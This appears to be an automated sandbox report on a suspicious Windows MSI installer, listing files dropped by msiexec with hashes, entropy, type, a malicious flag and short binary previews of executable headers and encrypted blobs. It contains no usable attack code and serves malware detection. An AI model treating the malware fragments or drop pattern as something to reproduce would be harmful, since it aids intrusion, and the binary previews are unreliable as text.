                                                  Preview:C.,n..7.L+.'.....c./.. 8....\U....cc.a.v....3Z.!...w.DE.Jv.@.Z^l....`.J7?...E|b).....(pG.......p......oD.~..l...h....^./.Ee'>.U-.$^0.Q......8.........s.8QJ..R;.g...............'..9.VG.....p...e.U.`.....(....m.\.x...o...N.X.T..zh*.;....F..0..7f.N0..".....=Ua.pK5.g>c.gN..w.y....`...Ok.R.....L.'M._...I^.4.%{....gL......8..;A.../.E"..._.....:.0.1..L1.C.....-.....4........%...?....W=t.{|!..~.a.G.....J._v.)..e....{/n....?m.%2......w.x=.4..D....Q..F..{F..r..W&Zm.8..bQ.....+.~.....lZ..WO.h.?.o..#.F.F.$..4...2.kz ....|].v[0......iMX_\..T!..9........|]..R.<c.B.Bn....N..N2...v?=(....&..p.S.<.........|e.-t.I5w;~.h+x..p..=-y.si.9.?.....J.->l...].2..g...ia..M...`.Ac.....w..."........6...s.gF5..y..ks. .p.g.-..z,?....I.`.@..z..ht.....Q..."qRJ......f...G.O..x..y<.....S.........C..!...;.....g..Fz2.75../i.2..4[.\.q....'8Z.:|5..]..Z.p.......zB.Gm.M.I`...7...7........C..;.*..S.(.......M9.....SJ^...K..C.k.M....V.uk..e..'...$.ZNi..yU4.4...^......h
                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):100966
                                                  Entropy (8bit):7.998412085921912
                                                  Encrypted:true
                                                  SSDEEP:3072:lG5ZPA2Ei0Glgejn7T8TCuIO5p6H6+cRJXEo+RMdxBJ:UZPd10GfneCXO5YcX00d
                                                  MD5:F55E7B7AF6071C10547C54D62204B475
                                                  SHA1:E036BEF92DFF196F6423F7B0C094F634DCC0DEF7
                                                  SHA-256:B862442376861EDA141DF226A952D35FB5E82AB127AD090C81EC46FF8CE33A0C
                                                  SHA-512:544492FBC7B42B400C664B27033F3EF212C261290B857408258BDBB3C3DF6D0C01D8585D4D2BE6133E15B90096230EF289164BF025B1FE0B5A66452FAA28F4EF
                                                  Malicious:false
                                                  Preview:.8K..^...D).cN.P....k..T@..m..Y.@.@[.....n..J...o...x...39.LZ.R]N..$..s..........A.Rt..Qd..b.W..l>..<f.E.6.!2#.p.S.(b.B.s......B.SE...M...7.w.........{N.....L!...].sV/...-8.....Q.:d).u.....A.4...F'E.B../.}.&.i....*".....i.q...D.<.....3#...2.><{{..{..n.a......xrq-.......#.......U.R..U ...........S?&.H...s....v.....np.~J6....W-..Sj....T$~..Q.`?5|N.5.2.?.....BU..@ub..*.....:.CZ.j...]..jH.....3..U...1&.s9.......*s_.d.c.4.X..3......Qk..SC.U...&.9F.t...h.9P..*....5..^.X.\....<...n....h4.....'./....1M..."?..(...C_..c....wGu.......`l.zd..FA...s.X......d{.|.1..M6.....[.X%....v..f...o.......L......|.....M...O.4^{R.{..!y. r7.._@.3.. m.*..].o.....Q....z.Q."(.<e..RyG.l.u.7.:.%Nz....2..`q............T..p....I@.D&.1=niUdal.Zq.....p4.`.Gi.D^a4.....H+!..X!.m.'....`.......I...~.:Y...f].0.y...s.r...G.......IOh...u.D.D6R..9.Sq.R.t7.....p..+.'..q.X....hn.D.Xb/.'..c.e.+..$.)=...V.RvK.t.Q/QM.pE.-..]..\p5.....UL\..a.5...s8R....+..8N..oYRO.A..f.r..TY..d..<.b,......
                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):37116
                                                  Entropy (8bit):7.994747677689325
                                                  Encrypted:true
                                                  SSDEEP:768:6yYUIATW3mYRfDNRFxvBqmTu9oUADyPH612ojJx2z94XSJj4:ZMvRPBqmqdlovb44XSJ4
                                                  MD5:541703A97409F03643B2F8AE7A534509
                                                  SHA1:BF5A64870DC5C3DFDC2209321BC1E5C62C21FFA8
                                                  SHA-256:0F18A5ADD9085FDBF60909A8CCA9DBE79F143AF2551926D7492192A7501B40DB
                                                  SHA-512:600BD2FEC8FA91CD5D86B1E51A7267D72EDD4DA8A2A2EF32E867319FAF45E3F479A2EBB4D5908DB59901877227EBCA5EDF7F60536966D0989F971898A2F7AF2C
                                                  Malicious:false
                                                  Preview:)3.~{..J.F..P............O...A1X^.{!l..-]C.@..n.g5\.....?...&.J..M.".i..#...Ec..Pl..p.C....'.o ....3-....lo...<M.m....i....~..yF...E....-..*.~.n.p.B...P..r.&......k..y|......{..C...\...k..~..~*.7...2.X.,.].....D...KR._<8..XD;.........=.L...*.8rw.7.A.K...R.......^<.B.Yd.z........+7s....j.......MP"..=.}ro.x..-O....7a!.....^Ir.|.E..=.1....H.....17./.C...$(.....&r]^.G...5"H.,D~..X.K.....%....",..c#.....,N....%.........f.g@.'V.5......a.{.mi;.;..P9...[l.G.W...0.E|....7.R#.M.+6.Y.Y.0e(..q...oy.....!..1.S..!...p...J..@.....n.]....R..n..EO......#..Pb........ejN....$2EUF....m...2..z.#t..t..)..r.M.7.a.rV....2.o..O`M.U..6...4-...Q.....P.c.N.?....U...o..CW..z..b...c.EM.o..Z&...*.....%..;.i$V....rx.:.......o.:.:.?/)..B..yy5..N)..f..T...,...7.$D....E..Bf...P....&.+.<.....l.....J.>.4..s....b@6Cs|.W*..A.D\..:..]..gSk"3..\.pRrP. ..t...a...e$......T.lB+..b..."e...R.w~...]?j.).35.Wf[.I.V..%.M...0A.A>...n.f....._..._...Z.u.. .W..n..N..A%w.......h....m.!..S/.*. ..,MOx
                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):2252904
                                                  Entropy (8bit):6.790821016155236
                                                  Encrypted:false
                                                  SSDEEP:49152:tX1r/EHlIN8LAEIenc6tn8F3KhSX2sJSPLvScP+B:tXh8Hlm8LAELc6pw3KhSX2sgPLg
                                                  MD5:DD36EA28C576FB0AD109B42D3D6C9F96
                                                  SHA1:34DCE3F5EC37472A79CEA43959C319CF67E22D35
                                                  SHA-256:07D849EAF8BBBCE5ABD7EC2348DFF0394F49E803C34120629AE258E62A1A32BD
                                                  SHA-512:F8CD93CC9888A95CA47852D7B6725213C0E0B905A66E19AC41428E83A0ADE17803EAA77F3C5C7719B733E745A09D669B89554647017D4414D34ED626C69B52E5
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....o.f.........."..........(....................@...........................#.....U."...@.........................N..........d....p...C...........8".h(....".....|v.......................u....... .....................<........................text...J........................... ..`.rdata....... ......................@..@.data....E.......8..................@....tls....]....@......................@...CPADinfo(....P......................@...malloc_h;....`...................... ..`.rsrc....C...p...D..................@..@.reloc........"......R!.............@..B........................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):734375
                                                  Entropy (8bit):7.96368320948898
                                                  Encrypted:false
                                                  SSDEEP:12288:8I3H1fJod/zgsz5B0GDJQrnKs8SNP+QSsSilxNwt0D+cImfd8xEqoO0TehEr2:b3VB4zEEmPLSUNwt0KcV6xEqoO0TO5
                                                  MD5:D7E5189AFFC7F032A6A2D5E4213395C8
                                                  SHA1:DD9A1D0DAD42162953E30D6351A427D6D8665918
                                                  SHA-256:652A51FF9C655862A5C5A876BE3252757D12543ADCE27EAF76C0287C976D2B30
                                                  SHA-512:7EB21092941DBA3CCD1AF9B8B9D884943FDA9DB253FC537A03E297C39E1FE7F98459A0CFCBB25D9C5B7873D2FC42221D038AB2ADA5D687690552A13686024D09
                                                  Malicious:false
                                                  Preview:..........H..."...........^...........~.........p?9...q?....r?....s?z...t?...u?N...v?....w?....x?d...y?...z?!...{?w...|?...}?,...~?.....?....?8....?.....?....?.....?.....?)....?o....?.....?Q....?.....?.....?.....?c....?.....?.....?Y....?T....?#....?.....?s....?.....?.....?3....?n....?S....?.....?.....?#....?.....?.&...?|'...?.'...?.@...?.B...?kB...?.B...?.K...?.U...?+i...?.}...?.~...?#....?~....?/....?E....?w....?.....?.....?F....?.....?`....?.....?.....?.....?5....?.....?.....?.....?#....?.....?.....?N....?=....?c....?.....?.!...?.)...?l2...?r;...?.D...?.N...?CW...?'`...?.j...?.s...?:{...?....?3....?x....?`....?.....?H....?.....?.....?.)...?.>...?5Q...?@m...?.....?....?Y....?.....?.....?.....?.....?d....?=(...?.;...?.I...?R_...?vj...?kt...?.{...?.....?D....?.....?.....?T....?Q....?.....?.....?}....?.....?Z....?.....?.....@. ...@J2...@MD...@.P...@.]...@.n...@b....@'....@.....@.....@.....@.....@.....@&....@.....@.....@.....@....%@#...&@....'@....(@....)@....*@....+@....,@. ..-@.&
                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):8739328
                                                  Entropy (8bit):7.900176092544119
                                                  Encrypted:false
                                                  SSDEEP:196608:auPCTUTkzRnAPpHk+YcvRnErpyrk6bJu7wbgkyO4RJ6hmkvp9oY:5RTaRgpE+dCVaVu7HGxX
                                                  MD5:059924B5F0C3B80280BFAF36D5E74D81
                                                  SHA1:3CE7BFACFF997DEAB7FB47696AF84BF6B2C33C99
                                                  SHA-256:FA31D1981E5C17D8F61EB95B70A1B123A7873A555BF55B26337A8193089590CB
                                                  SHA-512:7F7D03E8096BC2D5FBDF44060A68C7CD5B7383BD702FDACDDF0DF3780A06C9BE8A8C8355EF0FA1C7759525F1F6B45AB9FDE412A19239EAAF376E996E6BF2B80F
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........PE..L.....f...........!.....j....F......Z............@..........................P............@.....................................d........E...................@..$....................................................................................text....Z.......................... ..`.itext.......p...................... ..`.data....h..........................@....bss....h~...............................idata.......p......................@....didata.............................@....edata..............................@..@.rdata..E...........................@..@.O%......|..........................@..@.9Xc.....F...0......................@..@.debug....D.........................@..@.CE3.....I:..@Y..................... ..`.l`q................................@....p}\.....@.......B.................. ..`.rsrc....E...........J..............@..@.reloc..$....@.......R..
                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                  File Type:MS Windows cursor resource - 1 icon, 32x32, hotspot @0x0
                                                  Category:dropped
                                                  Size (bytes):326
                                                  Entropy (8bit):1.2807478913655284
                                                  Encrypted:false
                                                  SSDEEP:3:GlFFXlGFllfl/t+lklel/e/hRD:Gl/Nls62bD
                                                  MD5:DBD44C4AC444D2E0448EC0AD24EC0698
                                                  SHA1:371D786818F0A4242D2FCED0C83412CAA6C17A28
                                                  SHA-256:BF79BFFDBA70F456CB406FD1ECE8652750363B94188510B5D73F36C8EA6E7AE9
                                                  SHA-512:E8025CEB6ECB76B480F279D7E42DEEC8B96C0C1D64CFA3B7AF1E68320281F0F2A9B886AFC16AADE4E2178878970C4909FD650C1DC3C37594D040141ED0AB113F
                                                  Malicious:false
                                                  Preview:...... ......0.......(... ...@.......................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):48
                                                  Entropy (8bit):4.871115365169273
                                                  Encrypted:false
                                                  SSDEEP:3:fAz7JQfmSzgPpwqn:ycZqn
                                                  MD5:3553F3FEA80E7491631764D81E8DA0E1
                                                  SHA1:4EDB7CE66A17CC20E158E4283F2523F6E5E67854
                                                  SHA-256:7B37C3D6DBB8E564A62D71A6D89A600C25B5671D6DF43EB06FC990606D0144BF
                                                  SHA-512:E83850FD803A3252A868EA3552E079E9D95FFD1B8AF12790407FF88FB55D52E99FB0C6805EBB6D75EAFF61112C60EEF64325DC5B5244F4E5BB8CBC6A10FF4CCA
                                                  Malicious:false
                                                  Preview:A3HTFP/TX+mV9j5Fh8HL0WGszC3vw3RnVcmEj1bAzhVyw0Rj
                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                  Category:modified
                                                  Size (bytes):957728
                                                  Entropy (8bit):6.61749314970573
                                                  Encrypted:false
                                                  SSDEEP:24576:Chn0GjuAhKHBEwjUrHyu6Z5W1DYsHq6g3P0zAk74fJQf:ChdMHBEqkHj6Z5W1DYsHq6g3P0zAk7I
                                                  MD5:CFA38CC9320331B3D7A52A58A6AE4577
                                                  SHA1:9BAEDFB077FA677ACE979B46F597DAB16038D684
                                                  SHA-256:F3FA8B4F48697F87D34E8CA0262977FE0A8AE3EB04242E9143B3886E754918A0
                                                  SHA-512:BA2D9AA803C039F323868CDCEC9B532BBC67A7DD87D4156CF732A5CEAEEC3F804B390B1A03362A314147D7BC339D3B4D50C89673288855CAECD6CF78C13C1513
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...h.0f.........." ................................................................;.....`A............................................<!...&..P................q...t.. )......(.......8.......................(.......@............+...............................text...[........................... ..`.rdata..............................@..@.data....L......."..................@....pdata...q.......r..................@..@.gxfg...P).......*...2..............@..@.retplne.............\...................tls.................^..............@..._RDATA...............`..............@..@.rsrc................b..............@..@.reloc..(............f..............@..B........................................................................................................................................................................................................................
                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {F8A879B8-DD71-4150-8A82-B310C0805644}, Number of Words: 10, Subject: Windows Installer, Author: Microsoft Windows, Name of Creating Application: Windows Installer, Template: ;1046, Comments: A base dados do instalador contm a lgica e os dados necessrios para instalar o Windows Installer., Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Thu Aug 22 16:17:57 2024, Number of Pages: 200
                                                  Category:dropped
                                                  Size (bytes):27090432
                                                  Entropy (8bit):7.983012684293603
                                                  Encrypted:false
                                                  SSDEEP:786432:+mWauXOZ+iiOixYW1tdMzzL+B+8io6I72Mz96bakT:+mcXOZIYitdMrkioYs0a
                                                  MD5:BFAB767AF344FA22CFADFD11144AB5FE
                                                  SHA1:8C2BC0FD1FABF0410E5122C2B5929C34F306545A
                                                  SHA-256:5F75B66B8BB89295FF96BB25DC3D37C6B6F93EBC9507EF1C16FF5DC8CDDBEEF7
                                                  SHA-512:E4D80F08C093E364075E1DCF04C9F83A66DD33A5035CEC06D7C2B4DC50EA438A5B3155A3FC5E95DE40B2129EF84694143A9148F9075821DF569BCFA2D0B53892
                                                  Malicious:false
                                                  Preview:......................>.......................................................F.......b.......o...............................................z...{...|...}...~...........................................................................................................................................................................................................................................................................................................................................................................................#...4........................................................................................... ...!..."...-...2...%...&...'...(...)...*...+...,.........../...0...1...5...3...<...?...6...7...8...9...:...;...E...=...>.......@...A...B...C...D...............H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):602432
                                                  Entropy (8bit):6.469389454249605
                                                  Encrypted:false
                                                  SSDEEP:6144:QaFYTdIO9QmvIeVKVhaxkSBULBA4tKSM3BZC4o4AOl+mN9ysU5pvs8g73E:pYL9HXVW0xOA+KlZC4vc55s8g73E
                                                  MD5:B7A6A99CBE6E762C0A61A8621AD41706
                                                  SHA1:92F45DD3ED3AAEAAC8B488A84E160292FF86281E
                                                  SHA-256:39FD8D36F8E5D915AD571EA429DB3C3DE6E9C160DBEA7C3E137C9BA4B7FD301D
                                                  SHA-512:A17E4512D906599B7F004EBB2F19EE2566EE93C2C18114AC05B0A0115A8C481592788F6B97DA008795D5C31FB8D819AC82A5097B1792248319139C3FACE45642
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.............u..u..u.n.v..u.n.p...u...q..u...v..u...p...u.n.q..u.n.s..u.n.t..u..t...u.|...u.u..u....u.....u.w..u.Rich..u.........................PE..L....=.d.........."!...$.>...........Y.......P...............................0.......4....@.........................`X..d....a..,.......................@=.......h.....p...................@...........@............P..h............................text....=.......>.................. ..`.rdata...,...P.......B..............@..@.data...8%...........p..............@....rsrc...............................@..@.reloc...h.......j..................@..B........................................................................................................................................................................................................................................................................
                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):602432
                                                  Entropy (8bit):6.469389454249605
                                                  Encrypted:false
                                                  SSDEEP:6144:QaFYTdIO9QmvIeVKVhaxkSBULBA4tKSM3BZC4o4AOl+mN9ysU5pvs8g73E:pYL9HXVW0xOA+KlZC4vc55s8g73E
                                                  MD5:B7A6A99CBE6E762C0A61A8621AD41706
                                                  SHA1:92F45DD3ED3AAEAAC8B488A84E160292FF86281E
                                                  SHA-256:39FD8D36F8E5D915AD571EA429DB3C3DE6E9C160DBEA7C3E137C9BA4B7FD301D
                                                  SHA-512:A17E4512D906599B7F004EBB2F19EE2566EE93C2C18114AC05B0A0115A8C481592788F6B97DA008795D5C31FB8D819AC82A5097B1792248319139C3FACE45642
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.............u..u..u.n.v..u.n.p...u...q..u...v..u...p...u.n.q..u.n.s..u.n.t..u..t...u.|...u.u..u....u.....u.w..u.Rich..u.........................PE..L....=.d.........."!...$.>...........Y.......P...............................0.......4....@.........................`X..d....a..,.......................@=.......h.....p...................@...........@............P..h............................text....=.......>.................. ..`.rdata...,...P.......B..............@..@.data...8%...........p..............@....rsrc...............................@..@.reloc...h.......j..................@..B........................................................................................................................................................................................................................................................................
                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):602432
                                                  Entropy (8bit):6.469389454249605
                                                  Encrypted:false
                                                  SSDEEP:6144:QaFYTdIO9QmvIeVKVhaxkSBULBA4tKSM3BZC4o4AOl+mN9ysU5pvs8g73E:pYL9HXVW0xOA+KlZC4vc55s8g73E
                                                  MD5:B7A6A99CBE6E762C0A61A8621AD41706
                                                  SHA1:92F45DD3ED3AAEAAC8B488A84E160292FF86281E
                                                  SHA-256:39FD8D36F8E5D915AD571EA429DB3C3DE6E9C160DBEA7C3E137C9BA4B7FD301D
                                                  SHA-512:A17E4512D906599B7F004EBB2F19EE2566EE93C2C18114AC05B0A0115A8C481592788F6B97DA008795D5C31FB8D819AC82A5097B1792248319139C3FACE45642
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.............u..u..u.n.v..u.n.p...u...q..u...v..u...p...u.n.q..u.n.s..u.n.t..u..t...u.|...u.u..u....u.....u.w..u.Rich..u.........................PE..L....=.d.........."!...$.>...........Y.......P...............................0.......4....@.........................`X..d....a..,.......................@=.......h.....p...................@...........@............P..h............................text....=.......>.................. ..`.rdata...,...P.......B..............@..@.data...8%...........p..............@....rsrc...............................@..@.reloc...h.......j..................@..B........................................................................................................................................................................................................................................................................
                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):602432
                                                  Entropy (8bit):6.469389454249605
                                                  Encrypted:false
                                                  SSDEEP:6144:QaFYTdIO9QmvIeVKVhaxkSBULBA4tKSM3BZC4o4AOl+mN9ysU5pvs8g73E:pYL9HXVW0xOA+KlZC4vc55s8g73E
                                                  MD5:B7A6A99CBE6E762C0A61A8621AD41706
                                                  SHA1:92F45DD3ED3AAEAAC8B488A84E160292FF86281E
                                                  SHA-256:39FD8D36F8E5D915AD571EA429DB3C3DE6E9C160DBEA7C3E137C9BA4B7FD301D
                                                  SHA-512:A17E4512D906599B7F004EBB2F19EE2566EE93C2C18114AC05B0A0115A8C481592788F6B97DA008795D5C31FB8D819AC82A5097B1792248319139C3FACE45642
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.............u..u..u.n.v..u.n.p...u...q..u...v..u...p...u.n.q..u.n.s..u.n.t..u..t...u.|...u.u..u....u.....u.w..u.Rich..u.........................PE..L....=.d.........."!...$.>...........Y.......P...............................0.......4....@.........................`X..d....a..,.......................@=.......h.....p...................@...........@............P..h............................text....=.......>.................. ..`.rdata...,...P.......B..............@..@.data...8%...........p..............@....rsrc...............................@..@.reloc...h.......j..................@..B........................................................................................................................................................................................................................................................................
                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):602432
                                                  Entropy (8bit):6.469389454249605
                                                  Encrypted:false
                                                  SSDEEP:6144:QaFYTdIO9QmvIeVKVhaxkSBULBA4tKSM3BZC4o4AOl+mN9ysU5pvs8g73E:pYL9HXVW0xOA+KlZC4vc55s8g73E
                                                  MD5:B7A6A99CBE6E762C0A61A8621AD41706
                                                  SHA1:92F45DD3ED3AAEAAC8B488A84E160292FF86281E
                                                  SHA-256:39FD8D36F8E5D915AD571EA429DB3C3DE6E9C160DBEA7C3E137C9BA4B7FD301D
                                                  SHA-512:A17E4512D906599B7F004EBB2F19EE2566EE93C2C18114AC05B0A0115A8C481592788F6B97DA008795D5C31FB8D819AC82A5097B1792248319139C3FACE45642
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.............u..u..u.n.v..u.n.p...u...q..u...v..u...p...u.n.q..u.n.s..u.n.t..u..t...u.|...u.u..u....u.....u.w..u.Rich..u.........................PE..L....=.d.........."!...$.>...........Y.......P...............................0.......4....@.........................`X..d....a..,.......................@=.......h.....p...................@...........@............P..h............................text....=.......>.................. ..`.rdata...,...P.......B..............@..@.data...8%...........p..............@....rsrc...............................@..@.reloc...h.......j..................@..B........................................................................................................................................................................................................................................................................
                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):2426
                                                  Entropy (8bit):5.471082223598668
                                                  Encrypted:false
                                                  SSDEEP:48:CkaB0a6xA4AR0IuRr7YQ6O9MiB+fuRZYQ43r/8485i7AX6CRXfuRFs:Ck20txAvGhuhO8mwDh887i6CgE
                                                  MD5:AF1E44EF28188AC153CF4948184EDFD9
                                                  SHA1:B12D8C8D1D1F947D0E9E9CD966DA749CDACA4862
                                                  SHA-256:ED76205960F5FBD1E6F4558C311A6164E7033C892D916573F91E601EDE4F71C9
                                                  SHA-512:81E5167FD5AFFD207BAF14883685B4EF1D1137F800ECEDF011E178D411BF07B73368A454B23751176499CF5E8D89704B3A12330C1DC76C43A9F32F88DBD45942
                                                  Malicious:false
                                                  Preview:...@IXOS.@.....@.j.Y.@.....@.....@.....@.....@.....@......&.{1F409DE5-F41D-4B97-A3CD-EF30B43C9B23}..Windows Installer..nf963-5d-qns6-w812.msi.@.....@.....@.....@........&.{F8A879B8-DD71-4150-8A82-B310C0805644}.....@.....@.....@.....@.......@.....@.....@.......@......Windows Installer......Rollback..A.....o. .d.e. .r.e.s.t.a.u.r.a.....o.....RollbackCleanup..Removendo arquivos de backup..Arquivo: [1]...@.......@........ProcessComponents%.Atualizando o registro de componentes...@.....@.....@.]....&.{D608D6C6-E1D1-48EF-AE39-6038652DD840}8.01:\Software\Microsoft Windows\Windows Installer\Version.@.......@.....@.....@......&.{66973ED1-FE65-4BFA-9786-51A78A35D3C5}C.C:\Users\user\AppData\Roaming\Microsoft Windows\Windows Installer\.@.......@.....@.....@......&.{FC8D85E8-F55F-451C-A3A0-6E94DB1764F9}n.C:\Users\user\Documents\AppUp.IntelGraphicsExperience_1.100.5536.0_neutral_split.language-pt_8j3eq9eme6cttds\.@.......@.....@.....@......&.{A68D8AF3-C457-47CD-866F-170D19AD8D61};.C:\Users\user\A
                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                  Category:dropped
                                                  Size (bytes):20480
                                                  Entropy (8bit):1.1686573030376701
                                                  Encrypted:false
                                                  SSDEEP:12:JSbX72FjeiAGiLIlHVRpRh/7777777777777777777777777vDHFYeBn8+l0i8Q:JrQI5FieAF
                                                  MD5:D3DFDE85A9110AA11B89F1E92B1D9435
                                                  SHA1:A92CD0102235FCDFFC7068B6640270EE1A94FA83
                                                  SHA-256:060D53DD6AC247488C49C3822697A814A5846B113B48E8E88EF68C5B47FEF801
                                                  SHA-512:689F034390466AE585141E1CE9E77FC46EBE9E3D010532A064AA27E2DC1F11F336EEED70B6907C286D229D104C9A67C2ED64D69CB612F8AFF362FBC4A63F0D00
                                                  Malicious:false
                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                  Category:dropped
                                                  Size (bytes):20480
                                                  Entropy (8bit):1.5681224826136102
                                                  Encrypted:false
                                                  SSDEEP:48:JO8PhuuRc06WXJEnT567IAy3SCyZAECiCy3Wo5y3SCyNT4:JBhu1HnTuIB3ECt
                                                  MD5:C641A52DB3324891E9DF9F6248F0E32B
                                                  SHA1:1F1DD470474333021B9318328DF9DCBE106035C7
                                                  SHA-256:0D8D185D9A34EE89A85F2666D6767938F7A6F78B3CD5B827447B6610C5EAD88B
                                                  SHA-512:33ECA3F4F3E11410D9578DD6D7C944524AC2FD5165D7013C73309030813A060B47F20E014D2A99C489A8B7291C7AB7FDE13F8A4C32C7D2FAF61B05AE83C43389
                                                  Malicious:false
                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):432221
                                                  Entropy (8bit):5.37516660764235
                                                  Encrypted:false
                                                  SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26Kgaux:zTtbmkExhMJCIpEr8
                                                  MD5:4D49B3C349A8F394F917610A1CADBCE4
                                                  SHA1:D2EAD473AB82345C82AF3BC9E0EE1ACD58A02270
                                                  SHA-256:F554C46303E4503CAAA58F3A9E728D332A8803ECC3F9828D5D4CF28AD7F6FB05
                                                  SHA-512:D3DEC9C8AFA85F9EF6AA410E355C2FA60EAC9F485A9ED66F681D6EE7E90D9793BB6FBF94464EAB3042113ECA34B95AA4D2C69884C4FD19922BE188D8FBB7F270
                                                  Malicious:false
                                                  Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [
                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):512
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3::
                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                  Malicious:false
                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Windows\System32\msiexec.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):32768
                                                  Entropy (8bit):0.0752481518570756
                                                  Encrypted:false
                                                  SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKO4pVO+TeBtxAU0AVky6l+:2F0i8n0itFzDHFYeBn8+
